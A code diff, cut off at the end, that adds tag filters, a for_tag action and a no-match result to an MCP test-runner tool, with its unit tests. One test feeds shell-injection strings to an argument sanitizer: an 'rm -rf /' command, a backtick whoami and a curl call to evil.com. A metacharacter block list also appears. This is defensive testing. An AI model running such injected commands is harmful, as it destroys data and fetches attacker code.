+		const result = await caller.help();
+		// run_tests describes the new tags + passWithNoTests inputs and the no-match discriminator
+		expect(result.helpText).toContain("`tags?`");
+		expect(result.helpText).toContain("`passWithNoTests?`");
+		expect(result.helpText).toContain("no-match");
+		// inventory advertises the new tag kind
+		expect(result.helpText).toContain('kind: "tag"');
+		expect(result.helpText).toContain("byProject");
+		// test advertises the new for_tag action
+		expect(result.helpText).toContain('action: "for_tag"');
+	});
+
 	it("test_status returns dataAvailable=false on empty DB", async () => {
 		const caller = createTestCaller();
 		const result = await caller.test_status({});

--- a/packages/mcp/__test__/run-tests.test.ts
+++ b/packages/mcp/__test__/run-tests.test.ts
@@ -1,9 +1,15 @@
 import { Writable } from "node:stream";
+import { Schema } from "effect";
 import { afterAll, beforeAll, describe, expect, it } from "vitest";
+import type { RunTestsResultType, TagFilterType } from "../src/tools/run-tests.js";
 import {
+	RunTestsResult,
 	coerceErrors,
+	composeTagExpression,
+	formatNoMatchMarkdown,
 	formatReportJson,
 	formatReportMarkdown,
+	formatRunTestsMarkdown,
 	sanitizeTestArgs,
 	withStdioCaptured,
 } from "../src/tools/run-tests.js";
@@ -37,6 +43,158 @@ describe("sanitizeTestArgs", () => {
 		expect(sanitizeTestArgs(["./packages/reporter/src/utils/ansi.test.ts"])).toEqual([
 			"./packages/reporter/src/utils/ansi.test.ts",
 		]);
+	});
+
+	it("rejects shell-metachar injection in tag values", () => {
+		expect(() => sanitizeTestArgs(["int;rm -rf /"])).toThrow();
+		expect(() => sanitizeTestArgs(["unit`whoami`"])).toThrow();
+		expect(() => sanitizeTestArgs(["e2e$(curl evil.com)"])).toThrow();
+	});
+
+	it("allows simple alphanumeric tag values", () => {
+		expect(sanitizeTestArgs(["int", "e2e-slow", "unit_fast"])).toEqual(["int", "e2e-slow", "unit_fast"]);
+	});
+});
+
+describe("composeTagExpression", () => {
+	it("returns null when given null", () => {
+		expect(composeTagExpression(null)).toBeNull();
+	});
+
+	it("returns null when given undefined", () => {
+		expect(composeTagExpression(undefined)).toBeNull();
+	});
+
+	it("returns null when every sub-filter is empty or absent", () => {
+		expect(composeTagExpression({})).toBeNull();
+		expect(composeTagExpression({ all: [], any: [], none: [] })).toBeNull();
+	});
+
+	it("composes a single all filter joined by 'and'", () => {
+		expect(composeTagExpression({ all: ["int"] })).toBe("int");
+		expect(composeTagExpression({ all: ["int", "slow"] })).toBe("int and slow");
+	});
+
+	it("composes a single any filter joined by 'or' inside parentheses when 2+", () => {
+		expect(composeTagExpression({ any: ["unit"] })).toBe("unit");
+		expect(composeTagExpression({ any: ["unit", "int"] })).toBe("(unit or int)");
+		expect(composeTagExpression({ any: ["unit", "int", "e2e"] })).toBe("(unit or int or e2e)");
+	});
+
+	it("composes a single none filter as 'not <tag> and not <tag>'", () => {
+		expect(composeTagExpression({ none: ["slow"] })).toBe("not slow");
+		expect(composeTagExpression({ none: ["slow", "flaky"] })).toBe("not slow and not flaky");
+	});
+
+	it("joins all three sub-filters with 'and'", () => {
+		expect(
+			composeTagExpression({
+				all: ["int"],
+				any: ["fast", "slow"],
+				none: ["flaky"],
+			}),
+		).toBe("int and (fast or slow) and not flaky");
+	});
+
+	it("matches the spec's worked example for 'int and not slow'", () => {
+		expect(composeTagExpression({ all: ["int"], none: ["slow"] })).toBe("int and not slow");
+	});
+});
+
+describe("RunTestsResult schema with no-match", () => {
+	it("round-trips a no-match variant", async () => {
+		const payload: RunTestsResultType = {
+			kind: "no-match",
+			filter: {
+				project: "core",
+				files: ["packages/core/__test__/empty.test.ts"],
+				tags: { all: ["e2e"] },
+				resolvedExpression: "e2e",
+			},
+		};
+		// Encode then decode — the schema accepts the new branch.
+		const encoded = Schema.encodeUnknownSync(RunTestsResult)(payload);
+		const decoded = Schema.decodeUnknownSync(RunTestsResult)(encoded);
+		expect(decoded.kind).toBe("no-match");
+		if (decoded.kind !== "no-match") return;
+		expect(decoded.filter.project).toBe("core");
+		expect(decoded.filter.files).toEqual(["packages/core/__test__/empty.test.ts"]);
+		expect(decoded.filter.resolvedExpression).toBe("e2e");
+	});
+
+	it("accepts the existing ok / timeout / error variants", () => {
+		const okEnc = Schema.decodeUnknownSync(RunTestsResult)({
+			kind: "ok",
+			report: {
+				timestamp: "2026-05-15T00:00:00.000Z",
+				reason: "passed",
+				summary: { total: 0, passed: 0, failed: 0, skipped: 0, duration: 0 },
+				failed: [],
+				unhandledErrors: [],
+				failedFiles: [],
+			},
+			classifications: {},
+		});
+		expect(okEnc.kind).toBe("ok");
+		const timeoutEnc = Schema.decodeUnknownSync(RunTestsResult)({ kind: "timeout", timeoutSeconds: 120 });
+		expect(timeoutEnc.kind).toBe("timeout");
+		const errorEnc = Schema.decodeUnknownSync(RunTestsResult)({ kind: "error", message: "boom" });
+		expect(errorEnc.kind).toBe("error");
+	});
+});
+
+describe("formatNoMatchMarkdown", () => {
+	it("renders the resolved filter context and tag-introspection remediation", () => {
+		const tags: TagFilterType = { all: ["e2e"] };
+		const md = formatNoMatchMarkdown({
+			project: "core",
+			files: ["packages/core/__test__/empty.test.ts"],
+			tags,
+			resolvedExpression: "e2e",
+		});
+		expect(md).toContain("No tests matched the filter");
+		expect(md).toContain("project: `core`");
+		expect(md).toContain("packages/core/__test__/empty.test.ts");
+		expect(md).toContain("tags.all:");
+		expect(md).toContain("resolved expression: `e2e`");
+		expect(md).toContain('inventory({ kind: "tag" })');
+		expect(md).toContain('test({ action: "for_tag"');
+	});
+
+	it("omits the tag-specific remediation when no tag filter was supplied", () => {
+		const md = formatNoMatchMarkdown({
+			project: "core",
+			files: ["missing.test.ts"],
+			tags: null,
+			resolvedExpression: null,
+		});
+		expect(md).toContain("project: `core`");
+		expect(md).not.toContain('action: "for_tag"');
+		expect(md).toContain('action: "for_file"');
+	});
+
+	it("renders a placeholder when no filter context exists", () => {
+		const md = formatNoMatchMarkdown({
+			project: null,
+			files: [],
+			tags: null,
+			resolvedExpression: null,
+		});
+		expect(md).toContain("(no filter recorded)");
+	});
+
+	it("is reachable through formatRunTestsMarkdown's no-match branch", () => {
+		const md = formatRunTestsMarkdown({
+			kind: "no-match",
+			filter: {
+				project: null,
+				files: [],
+				tags: { none: ["slow"] },
+				resolvedExpression: "not slow",
+			},
+		});
+		expect(md).toContain("No tests matched the filter");
+		expect(md).toContain("tags.none:");
 	});
 });
 

--- a/packages/mcp/__test__/test-for-tag.test.ts
+++ b/packages/mcp/__test__/test-for-tag.test.ts
@@ -1,0 +1,234 @@
+/**
+ * Unit tests for test({ action: "for_tag" }) MCP tool.
+ *
+ * Mirrors the existing test({ action: "list" }) shape: groups by project
+ * when project is omitted; returns a single group when project is supplied.
+ */
+import { Effect, Layer, ManagedRuntime, Schema } from "effect";
+import { afterAll, describe, expect, it } from "vitest";
+import { DataStore, OutputPipelineLive, ProjectDiscoveryTest } from "vitest-agent-sdk";
+import type { McpContext } from "../src/context.js";
+import { createCallerFactory, createCurrentSessionIdRef, createSessionContextRef } from "../src/context.js";
+import { appRouter } from "../src/router.js";
+import type { TestResultType } from "../src/tools/test.js";
+import { TestResult, formatTestMarkdown } from "../src/tools/test.js";
+import { DataStoreTestLayer } from "./utils/layers.js";
+
+const TestLayer = Layer.mergeAll(DataStoreTestLayer, OutputPipelineLive, ProjectDiscoveryTest.layer([]));
+const testRuntime = ManagedRuntime.make(TestLayer);
+
+const makeCaller = () => {
+	const factory = createCallerFactory(appRouter);
+	return factory({
+		runtime: testRuntime as unknown as McpContext["runtime"],
+		cwd: process.cwd(),
+		currentSessionId: createCurrentSessionIdRef(),
+		sessionContext: createSessionContextRef(),
+	});
+};
+
+afterAll(async () => {
+	await testRuntime.dispose();
+});
+
+const settingsInput = {
+	vitestVersion: "3.2.0",
+	pool: "forks",
+	environment: "node",
+	testTimeout: 5000,
+	hookTimeout: 10000,
+	slowTestThreshold: 300,
+	maxConcurrency: 5,
+	maxWorkers: 4,
+	isolate: true,
+	bail: 0,
+	globals: false,
+	fileParallelism: true,
+	sequenceSeed: 42,
+	coverageProvider: "v8",
+};
+
+const seedFixture = async () => {
+	await testRuntime.runPromise(
+		Effect.gen(function* () {
+			const store = yield* DataStore;
+			yield* store.writeSettings("for-tag-hash", settingsInput, {});
+
+			// proj-alpha: two int-tagged tests + one plain test
+			const runAlpha = yield* store.writeRun({
+				invocationId: "for-tag-alpha",
+				project: "proj-alpha",
+				settingsHash: "for-tag-hash",
+				timestamp: "2026-05-01T00:00:00.000Z",
+				commitSha: "abc",
+				branch: "main",
+				reason: "passed" as const,
+				duration: 100,
+				total: 3,
+				passed: 3,
+				failed: 0,
+				skipped: 0,
+				scoped: false,
+			});
+			const fileAlpha = yield* store.ensureFile("src/alpha.test.ts");
+			const [modAlpha] = yield* store.writeModules(runAlpha, [
+				{ fileId: fileAlpha, relativeModuleId: "src/alpha.test.ts", state: "passed", duration: 60 },
+			]);
+			yield* store.writeTestCases(modAlpha, [
+				{ name: "int a1", fullName: "alpha > int a1", state: "passed", tags: ["int"] },
+				{ name: "int a2", fullName: "alpha > int a2", state: "passed", tags: ["int"] },
+				{ name: "plain", fullName: "alpha > plain", state: "passed" },
+			]);
+
+			// proj-beta: one int-tagged test
+			const runBeta = yield* store.writeRun({
+				invocationId: "for-tag-beta",
+				project: "proj-beta",
+				settingsHash: "for-tag-hash",
+				timestamp: "2026-05-01T00:00:00.000Z",
+				commitSha: "abc",
+				branch: "main",
+				reason: "passed" as const,
+				duration: 80,
+				total: 1,
+				passed: 1,
+				failed: 0,
+				skipped: 0,
+				scoped: false,
+			});
+			const fileBeta = yield* store.ensureFile("src/beta.test.ts");
+			const [modBeta] = yield* store.writeModules(runBeta, [
+				{ fileId: fileBeta, relativeModuleId: "src/beta.test.ts", state: "passed", duration: 30 },
+			]);
+			yield* store.writeTestCases(modBeta, [
+				{ name: "int b1", fullName: "beta > int b1", state: "passed", tags: ["int"] },
+			]);
+		}),
+	);
+};
+
+describe("test({ action: 'for_tag' }) — unscoped", () => {
+	it("groups all int-tagged tests by project across the latest run of each project", async () => {
+		await seedFixture();
+		const caller = makeCaller();
+		const result = (await caller.test({ action: "for_tag", tag: "int" })) as TestResultType;
+		expect(result.action).toBe("for_tag");
+		if (result.action !== "for_tag") return;
+		expect(result.tag).toBe("int");
+		expect(result.count).toBe(3); // 2 from alpha + 1 from beta
+		expect(result.groups.length).toBe(2);
+		const alpha = result.groups.find((g) => g.project === "proj-alpha");
+		expect(alpha?.tests.length).toBe(2);
+		const beta = result.groups.find((g) => g.project === "proj-beta");
+		expect(beta?.tests.length).toBe(1);
+		expect(beta?.tests[0].fullName).toBe("beta > int b1");
+	});
+});
+
+describe("test({ action: 'for_tag' }) — project scoped", () => {
+	it("returns a single group when project is supplied", async () => {
+		const caller = makeCaller();
+		const result = (await caller.test({ action: "for_tag", tag: "int", project: "proj-alpha" })) as TestResultType;
+		expect(result.action).toBe("for_tag");
+		if (result.action !== "for_tag") return;
+		expect(result.count).toBe(2);
+		expect(result.groups.length).toBe(1);
+		expect(result.groups[0].project).toBe("proj-alpha");
+		expect(result.groups[0].tests.map((t) => t.fullName).sort()).toEqual(["alpha > int a1", "alpha > int a2"]);
+	});
+
+	it("returns empty groups when the tag does not match any test in the project", async () => {
+		const caller = makeCaller();
+		const result = (await caller.test({
+			action: "for_tag",
+			tag: "nonexistent",
+			project: "proj-alpha",
+		})) as TestResultType;
+		expect(result.action).toBe("for_tag");
+		if (result.action !== "for_tag") return;
+		expect(result.count).toBe(0);
+		expect(result.groups).toEqual([]);
+	});
+});
+
+describe("formatTestMarkdown — for_tag", () => {
+	it("renders a per-project table when groups are non-empty", () => {
+		const md = formatTestMarkdown({
+			action: "for_tag",
+			tag: "int",
+			count: 3,
+			groups: [
+				{
+					project: "proj-alpha",
+					tests: [
+						{
+							id: 1,
+							fullName: "alpha > int a1",
+							state: "passed",
+							duration: 5,
+							module: "src/alpha.test.ts",
+							classification: null,
+						},
+					],
+				},
+				{
+					project: "proj-beta",
+					tests: [
+						{
+							id: 2,
+							fullName: "beta > int b1",
+							state: "passed",
+							duration: 3,
+							module: "src/beta.test.ts",
+							classification: null,
+						},
+					],
+				},
+			],
+		});
+		expect(md).toContain("# Tests tagged `int`");
+		expect(md).toContain("Found 3 tests across 2 projects");
+		expect(md).toContain("### proj-alpha");
+		expect(md).toContain("### proj-beta");
+		expect(md).toContain("alpha > int a1");
+	});
+
+	it("falls back to the empty message when no tests match", () => {
+		const md = formatTestMarkdown({
+			action: "for_tag",
+			tag: "missing",
+			count: 0,
+			groups: [],
+		});
+		expect(md).toContain("No tests found tagged `missing`");
+		expect(md).toContain('inventory({ kind: "tag" })');
+	});
+});
+
+describe("TestResult schema accepts for_tag variant", () => {
+	it("round-trips a for_tag payload through encode + decode", () => {
+		const payload: TestResultType = {
+			action: "for_tag",
+			tag: "int",
+			count: 1,
+			groups: [
+				{
+					project: "proj-alpha",
+					tests: [
+						{
+							id: 1,
+							fullName: "alpha > int a1",
+							state: "passed",
+							duration: 5,
+							module: "src/alpha.test.ts",
+							classification: null,
+						},
+					],
+				},
+			],
+		};
+		const encoded = Schema.encodeUnknownSync(TestResult)(payload);
+		const decoded = Schema.decodeUnknownSync(TestResult)(encoded);
+		expect(decoded.action).toBe("for_tag");
+	});
+});

--- a/packages/mcp/__test__/test-for-tag.test.ts
+++ b/packages/mcp/__test__/test-for-tag.test.ts
@@ -5,7 +5,7 @@
  * when project is omitted; returns a single group when project is supplied.
  */
 import { Effect, Layer, ManagedRuntime, Schema } from "effect";
-import { afterAll, describe, expect, it } from "vitest";
+import { afterAll, beforeAll, describe, expect, it } from "vitest";
 import { DataStore, OutputPipelineLive, ProjectDiscoveryTest } from "vitest-agent-sdk";
 import type { McpContext } from "../src/context.js";
 import { createCallerFactory, createCurrentSessionIdRef, createSessionContextRef } from "../src/context.js";
@@ -107,9 +107,15 @@ const seedFixture = async () => {
 	);
 };
 
+// Seed once at file scope. The latest-run-per-project filter would
+// double-count if we re-seeded with the same timestamps in each test; seeding
+// via beforeAll keeps every `it` independent of ordering.
+beforeAll(async () => {
+	await seedFixture();
+});
+
 describe("test({ action: 'for_tag' }) — unscoped", () => {
 	it("groups all int-tagged tests by project across the latest run of each project", async () => {
-		await seedFixture();
 		const caller = makeCaller();
 		const result = (await caller.test({ action: "for_tag", tag: "int" })) as TestResultType;
 		expect(result.action).toBe("for_tag");

--- a/packages/mcp/src/tools/help.ts
+++ b/packages/mcp/src/tools/help.ts
@@ -38,18 +38,19 @@ const HELP_TEXT = `# vitest-agent MCP Tools
 | \`test_history\` | \`project\` | Flaky/persistent/recovered tests |
 | \`test_trends\` | \`project\`, \`limit?\` | Coverage trajectory over time |
 | \`test_errors\` | \`project\`, \`errorName?\`, \`format?\` (\`markdown\` \\| \`xml\`) | Errors with diffs, stacks, and the cite-able \`testErrorId\` / \`topStackFrameId\` values needed by \`hypothesis (action: record)\` |
-| \`test\` | \`action\` (\`list\`/\`get\`/\`for_file\`), plus per-action params | Consolidated test inspection: list/get/for_file |
+| \`test\` | \`action\` (\`list\`/\`get\`/\`for_file\`/\`for_tag\`), plus per-action params | Consolidated test inspection: list/get/for_file/for_tag |
 
 \`test\` actions:
 - \`{ action: "list", project?, state?, module?, limit? }\`
 - \`{ action: "get", fullName, project? }\`
 - \`{ action: "for_file", filePath }\`
+- \`{ action: "for_tag", tag, project? }\` — list every test carrying a tag, grouped by project (or one group when project is supplied)
 
 ## Discovery
 
 | Tool | Parameters | Description |
 | ---- | ---------- | ----------- |
-| \`inventory\` | \`kind\` (\`project\`/\`module\`/\`suite\`/\`session\`), plus per-kind params | Consolidated entity discovery |
+| \`inventory\` | \`kind\` (\`project\`/\`module\`/\`suite\`/\`session\`/\`tag\`), plus per-kind params | Consolidated entity discovery |
 | \`settings_list\` | _(none)_ | Vitest config snapshots |
 
 \`inventory\` kinds:
@@ -58,12 +59,13 @@ const HELP_TEXT = `# vitest-agent MCP Tools
 - \`{ kind: "suite", project?, module? }\`
 - \`{ kind: "session", project?, agentKind?, limit? }\` (omit \`id\` to list)
 - \`{ kind: "session", id }\` (single-session detail)
+- \`{ kind: "tag", project? }\` — per-tag module/test counts; unscoped form carries a \`byProject\` breakdown per tag
 
 ## Execution
 
 | Tool | Parameters | Description |
 | ---- | ---------- | ----------- |
-| \`run_tests\` | \`files?\`, \`project?\`, \`timeout?\`, \`format?\` | Run vitest with optional filters |
+| \`run_tests\` | \`files?\`, \`project?\`, \`tags?\`, \`passWithNoTests?\`, \`timeout?\`, \`format?\` | Run vitest with optional filters. \`tags\` is a structured \`{ all?, any?, none? }\` filter that intersects with \`project\` and \`files\` via AND. When the resolved filter set matches zero test cases the result discriminator is \`no-match\` (carrying the resolved filter context) rather than \`ok\`. \`passWithNoTests\` is a per-call override of Vitest's project-level \`test.passWithNoTests\` policy |
 | \`register_agent\` | \`sessionId\`, \`agentType\`, \`hostKind?\`, \`parentAgentId?\`, \`clientNonce?\`, \`startGitBranch?\`, \`startGitCommitSha?\`, \`startWorktreeDir?\` | Idempotent agent invocation registration |
 
 ## Diagnostics

--- a/packages/mcp/src/tools/inventory.ts
+++ b/packages/mcp/src/tools/inventory.ts
@@ -93,6 +93,38 @@ const SessionListInventory = Schema.Struct({
 	sessions: Schema.Array(SessionRow),
 }).annotations({ identifier: "SessionListInventory" });
 
+const TagProjectBreakdown = Schema.Struct({
+	project: Schema.String,
+	moduleCount: Schema.Number,
+	testCount: Schema.Number,
+}).annotations({ identifier: "TagProjectBreakdown" });
+
+const TagRowScoped = Schema.Struct({
+	tag: Schema.String,
+	moduleCount: Schema.Number,
+	testCount: Schema.Number,
+}).annotations({ identifier: "TagRowScoped" });
+
+const TagRowUnscoped = Schema.Struct({
+	tag: Schema.String,
+	moduleCount: Schema.Number,
+	testCount: Schema.Number,
+	byProject: Schema.Array(TagProjectBreakdown),
+}).annotations({ identifier: "TagRowUnscoped" });
+
+const TagInventoryScoped = Schema.Struct({
+	inventoryKind: Schema.Literal("tag_scoped"),
+	project: Schema.String,
+	count: Schema.Number,
+	tags: Schema.Array(TagRowScoped),
+}).annotations({ identifier: "TagInventoryScoped" });
+
+const TagInventoryUnscoped = Schema.Struct({
+	inventoryKind: Schema.Literal("tag_unscoped"),
+	count: Schema.Number,
+	tags: Schema.Array(TagRowUnscoped),
+}).annotations({ identifier: "TagInventoryUnscoped" });
+
 export const InventoryResult = Schema.Union(
 	ProjectInventory,
 	ModuleInventory,
@@ -100,11 +132,13 @@ export const InventoryResult = Schema.Union(
 	SessionDetailFound,
 	SessionDetailMissing,
 	SessionListInventory,
+	TagInventoryScoped,
+	TagInventoryUnscoped,
 ).annotations({
 	identifier: "InventoryResult",
 	title: "inventory result",
 	description:
-		"Discriminate on `inventoryKind`. project/module/suite carry counted lists; session_detail discriminates further on `found`; session_list returns the matching sessions.",
+		"Discriminate on `inventoryKind`. project/module/suite carry counted lists; session_detail discriminates further on `found`; session_list returns the matching sessions; tag_scoped and tag_unscoped carry per-tag counts (the unscoped form also carries a `byProject` breakdown per tag).",
 });
 export type InventoryResultType = Schema.Schema.Type<typeof InventoryResult>;
 
@@ -167,6 +201,27 @@ export const formatInventoryMarkdown = (data: InventoryResultType): string => {
 		if (s.parentSessionId !== null) lines.push(`- parentSessionId: ${s.parentSessionId}`);
 		return lines.join("\n");
 	}
+	if (data.inventoryKind === "tag_scoped") {
+		if (data.count === 0) {
+			return `No tags recorded for project \`${data.project}\`. Run run_tests({}) to populate.`;
+		}
+		const lines: string[] = [`## Tags — ${data.project}`, "", "| Tag | Modules | Tests |", "| --- | --- | --- |"];
+		for (const t of data.tags) {
+			lines.push(`| ${t.tag} | ${t.moduleCount} | ${t.testCount} |`);
+		}
+		return lines.join("\n");
+	}
+	if (data.inventoryKind === "tag_unscoped") {
+		if (data.count === 0) {
+			return "No tags recorded. Run run_tests({}) to populate.";
+		}
+		const lines: string[] = ["## Tags", "", "| Tag | Modules | Tests | Projects |", "| --- | --- | --- | --- |"];
+		for (const t of data.tags) {
+			const projectsBreakdown = t.byProject.map((p) => `${p.project} (${p.testCount})`).join(", ");
+			lines.push(`| ${t.tag} | ${t.moduleCount} | ${t.testCount} | ${projectsBreakdown} |`);
+		}
+		return lines.join("\n");
+	}
 	// session_list
 	if (data.count === 0) return "No sessions recorded yet.";
 	const lines: string[] = ["# Sessions", ""];
@@ -201,8 +256,12 @@ const SessionVariant = Schema.Struct({
 	agentKind: Schema.optional(Schema.Literal("main", "subagent")),
 	limit: Schema.optional(Schema.Number),
 });
+const TagVariant = Schema.Struct({
+	kind: Schema.Literal("tag"),
+	project: Schema.optional(Schema.String),
+});
 
-const InventoryInput = Schema.Union(ProjectVariant, ModuleVariant, SuiteVariant, SessionVariant);
+const InventoryInput = Schema.Union(ProjectVariant, ModuleVariant, SuiteVariant, SessionVariant, TagVariant);
 
 export const inventory = publicProcedure
 	.input(Schema.standardSchemaV1(InventoryInput))
@@ -280,6 +339,61 @@ export const inventory = publicProcedure
 								...(variant.limit !== undefined && { limit: variant.limit }),
 							});
 							return { inventoryKind: "session_list" as const, count: rows.length, sessions: rows };
+						}),
+					tag: (variant) =>
+						Effect.gen(function* () {
+							const reader = yield* DataReader;
+							if (variant.project !== undefined) {
+								const rows = yield* reader.listTagInventory({ project: variant.project });
+								return {
+									inventoryKind: "tag_scoped" as const,
+									project: variant.project,
+									count: rows.length,
+									tags: rows.map((r) => ({
+										tag: r.tag,
+										moduleCount: r.moduleCount,
+										testCount: r.testCount,
+									})),
+								};
+							}
+							// Unscoped: pivot the flat (tag, project) rows into one row per tag
+							// with an inline byProject breakdown and aggregated counts.
+							const rows = yield* reader.listTagInventory();
+							const byTag = new Map<
+								string,
+								{
+									moduleCount: number;
+									testCount: number;
+									byProject: Array<{ project: string; moduleCount: number; testCount: number }>;
+								}
+							>();
+							for (const r of rows) {
+								let entry = byTag.get(r.tag);
+								if (entry === undefined) {
+									entry = { moduleCount: 0, testCount: 0, byProject: [] };
+									byTag.set(r.tag, entry);
+								}
+								entry.moduleCount += r.moduleCount;
+								entry.testCount += r.testCount;
+								entry.byProject.push({
+									project: r.project,
+									moduleCount: r.moduleCount,
+									testCount: r.testCount,
+								});
+							}
+							const tags = Array.from(byTag.entries())
+								.sort(([a], [b]) => a.localeCompare(b))
+								.map(([tag, e]) => ({
+									tag,
+									moduleCount: e.moduleCount,
+									testCount: e.testCount,
+									byProject: e.byProject,
+								}));
+							return {
+								inventoryKind: "tag_unscoped" as const,
+								count: tags.length,
+								tags,
+							};
 						}),
 				}),
 			),

--- a/packages/mcp/src/tools/run-tests.ts
+++ b/packages/mcp/src/tools/run-tests.ts
@@ -28,13 +28,68 @@ const RunTestsError = Schema.Struct({
 	message: Schema.String,
 }).annotations({ identifier: "RunTestsError" });
 
-export const RunTestsResult = Schema.Union(RunTestsOk, RunTestsTimeout, RunTestsError).annotations({
+const TagFilter = Schema.Struct({
+	all: Schema.optional(Schema.Array(Schema.String)),
+	any: Schema.optional(Schema.Array(Schema.String)),
+	none: Schema.optional(Schema.Array(Schema.String)),
+}).annotations({
+	identifier: "TagFilter",
+	description:
+		"All three sub-filters AND together with `project` and `files`. `all` requires every listed tag on the test. `any` requires at least one. `none` excludes any test carrying a listed tag.",
+});
+export type TagFilterType = Schema.Schema.Type<typeof TagFilter>;
+
+const RunTestsNoMatch = Schema.Struct({
+	kind: Schema.Literal("no-match").annotations({
+		description:
+			"Discriminant — the resolved filter set matched zero test cases. Tests did not run; this is independent of passWithNoTests policy.",
+	}),
+	filter: Schema.Struct({
+		project: Schema.NullOr(Schema.String),
+		files: Schema.Array(Schema.String),
+		tags: Schema.NullOr(TagFilter),
+		resolvedExpression: Schema.NullOr(Schema.String),
+	}),
+}).annotations({ identifier: "RunTestsNoMatch" });
+
+export const RunTestsResult = Schema.Union(RunTestsOk, RunTestsTimeout, RunTestsError, RunTestsNoMatch).annotations({
 	identifier: "RunTestsResult",
 	title: "run_tests result",
 	description:
-		"Discriminate on `kind`. ok carries the full AgentReport plus per-test classifications; timeout / error are the two failure modes.",
+		"Discriminate on `kind`. ok carries the full AgentReport plus per-test classifications; timeout / error are the two failure modes; no-match indicates that the resolved filter set matched zero test cases.",
 });
 export type RunTestsResultType = Schema.Schema.Type<typeof RunTestsResult>;
+
+/**
+ * Compose a Vitest tag-expression string from a structured {@link TagFilter}.
+ *
+ * Returns `null` when every sub-filter is empty/absent. Combines the three
+ * sub-filters with ` and `:
+ *
+ * - `all: ["int", "slow"]`   → `"int and slow"`
+ * - `any: ["unit", "int"]`   → `"(unit or int)"`
+ * - `none: ["slow", "flaky"]`→ `"not slow and not flaky"`
+ *
+ * @internal
+ */
+export function composeTagExpression(tags: TagFilterType | null | undefined): string | null {
+	if (!tags) return null;
+	const parts: string[] = [];
+	const all = tags.all ?? [];
+	const any = tags.any ?? [];
+	const none = tags.none ?? [];
+	if (all.length > 0) {
+		parts.push(all.join(" and "));
+	}
+	if (any.length > 0) {
+		parts.push(any.length === 1 ? any[0] : `(${any.join(" or ")})`);
+	}
+	if (none.length > 0) {
+		parts.push(none.map((t) => `not ${t}`).join(" and "));
+	}
+	if (parts.length === 0) return null;
+	return parts.join(" and ");
+}
 
 const FORBIDDEN_CHARS = /[;|&`$(){}[\]<>!#]/;
 
@@ -171,8 +226,54 @@ export function formatReportJson(report: AgentReport, classifications?: Readonly
 export function formatRunTestsMarkdown(data: RunTestsResultType): string {
 	if (data.kind === "timeout") return `Test run timed out after ${data.timeoutSeconds} seconds.`;
 	if (data.kind === "error") return `Test run failed: ${data.message}`;
+	if (data.kind === "no-match") return formatNoMatchMarkdown(data.filter);
 	const classMap = new Map<string, string>(Object.entries(data.classifications));
 	return formatReportMarkdown(data.report, classMap);
+}
+
+/**
+ * Render the `no-match` filter context plus a remediation pointer aimed at
+ * tag introspection. Pure helper; called by {@link formatRunTestsMarkdown}.
+ *
+ * @internal
+ */
+export function formatNoMatchMarkdown(filter: {
+	readonly project: string | null;
+	readonly files: ReadonlyArray<string>;
+	readonly tags: TagFilterType | null;
+	readonly resolvedExpression: string | null;
+}): string {
+	const lines: string[] = ["## No tests matched the filter", ""];
+	const parts: string[] = [];
+	if (filter.project !== null) parts.push(`project: \`${filter.project}\``);
+	if (filter.files.length > 0) parts.push(`files: ${filter.files.map((f) => `\`${f}\``).join(", ")}`);
+	if (filter.tags !== null) {
+		const t = filter.tags;
+		if (t.all && t.all.length > 0) parts.push(`tags.all: ${t.all.map((s) => `\`${s}\``).join(", ")}`);
+		if (t.any && t.any.length > 0) parts.push(`tags.any: ${t.any.map((s) => `\`${s}\``).join(", ")}`);
+		if (t.none && t.none.length > 0) parts.push(`tags.none: ${t.none.map((s) => `\`${s}\``).join(", ")}`);
+	}
+	if (filter.resolvedExpression !== null) {
+		parts.push(`resolved expression: \`${filter.resolvedExpression}\``);
+	}
+	if (parts.length === 0) {
+		lines.push("- (no filter recorded)");
+	} else {
+		for (const p of parts) lines.push(`- ${p}`);
+	}
+	lines.push("");
+	lines.push("### Next steps");
+	if (filter.tags !== null) {
+		lines.push('- Confirm the tag exists: `inventory({ kind: "tag" })`');
+		lines.push('- List tests for a specific tag: `test({ action: "for_tag", tag: "<name>" })`');
+	}
+	if (filter.files.length > 0) {
+		lines.push('- Verify file paths exist or list tests in a file with `test({ action: "for_file", filePath })`');
+	}
+	if (filter.project !== null) {
+		lines.push('- Verify the project name with `inventory({ kind: "project" })`');
+	}
+	return lines.join("\n");
 }
 
 export const RunTestsAsMarkdown = Schema.transformOrFail(RunTestsResult, Schema.String, {
@@ -291,6 +392,8 @@ export const runTests = publicProcedure
 			Schema.Struct({
 				files: Schema.optional(Schema.Array(Schema.String)),
 				project: Schema.optional(Schema.String),
+				tags: Schema.optional(TagFilter),
+				passWithNoTests: Schema.optional(Schema.Boolean),
 				timeout: Schema.optional(Schema.Number),
 				// Injected by the `pre-tool-use-mcp-run-tests.sh` hook —
 				// agents do not pass this directly. Carries the recovered
@@ -311,6 +414,17 @@ export const runTests = publicProcedure
 			serializeRunTests(async (): Promise<RunTestsResultType> => {
 				const files = input.files ? sanitizeTestArgs(input.files) : [];
 				const project = input.project ? sanitizeTestArgs([input.project])[0] : undefined;
+				// Sanitize tag values too — they ride into Vitest's tag-expression
+				// compiler unmodified, so shell-metachar injections must be
+				// rejected the same way file/project arguments are.
+				const tagsInput = input.tags;
+				if (tagsInput) {
+					if (tagsInput.all) sanitizeTestArgs(tagsInput.all);
+					if (tagsInput.any) sanitizeTestArgs(tagsInput.any);
+					if (tagsInput.none) sanitizeTestArgs(tagsInput.none);
+				}
+				const resolvedExpression = composeTagExpression(tagsInput ?? null);
+				const hasFilter = files.length > 0 || project !== undefined || resolvedExpression !== null;
 
 				const timeoutMs = (input.timeout ?? 120) * 1000;
 
@@ -363,6 +477,16 @@ export const runTests = publicProcedure
 							// orchestrator to make a parallel Bash --coverage call
 							// just to populate file_coverage rows.
 							...(project ? { project } : {}),
+							// Vitest's `tagsFilter: string[]` accepts one or more
+							// tag-expression strings (AND-ed together). We compose
+							// a single expression from the structured TagFilter
+							// and pass it as a one-element array.
+							...(resolvedExpression !== null ? { tagsFilter: [resolvedExpression] } : {}),
+							// Per-call override of Vitest's native test.passWithNoTests.
+							// When unset on the input, Vitest's project-level value
+							// (already captured by the plugin onto ResolvedReporterConfig)
+							// applies.
+							...(input.passWithNoTests !== undefined ? { passWithNoTests: input.passWithNoTests } : {}),
 						},
 						{}, // viteOverrides
 						{
@@ -386,6 +510,24 @@ export const runTests = publicProcedure
 
 					const testModules = result.testModules as unknown as Parameters<typeof buildAgentReport>[0];
 					const unhandledErrors = coerceErrors(result.unhandledErrors);
+
+					// Detect "no test cases matched the resolved filter set".
